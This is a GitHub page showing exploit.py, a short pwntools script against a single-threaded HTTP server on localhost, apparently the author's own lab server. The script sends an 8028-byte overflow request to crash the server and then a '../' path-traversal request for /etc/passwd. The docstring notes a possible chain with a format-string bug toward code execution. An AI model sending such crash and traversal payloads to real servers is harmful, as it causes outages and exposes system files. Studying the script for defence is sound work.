-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
33 lines (24 loc) · 930 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
'''
A simple script to exploit buffer overflow and local file inclusion in the given single threaded server. This
script will cause the server to crash.
Since the stack canary is turned on by default, the buffer overflow will change
the stack canary causing the server to detect an overflow. If somehow an attacker can
get the server binary and if there is a format string vulnerability, he can combine the
two to get remote code execution.
The buffer overflow is mitigated in the latest code by using bound on variables.
'''
from pwn import remote
# Constants
host = "127.0.0.1"
port = 8081
r = remote(host, port)
# offset for buffer overflow
payload = "/" + "A"*8028
# Send the payload
r.sendline("GET {} HTTP/1.1".format(payload))
r.sendline(b"\r\n")
# Exploiting local file inclusion
payload = '/../../../../../../../etc/passwd'
r.sendline("GET {} HTTP/1.1".format(payload))
r.sendline(b"\r\n")
r.interactive()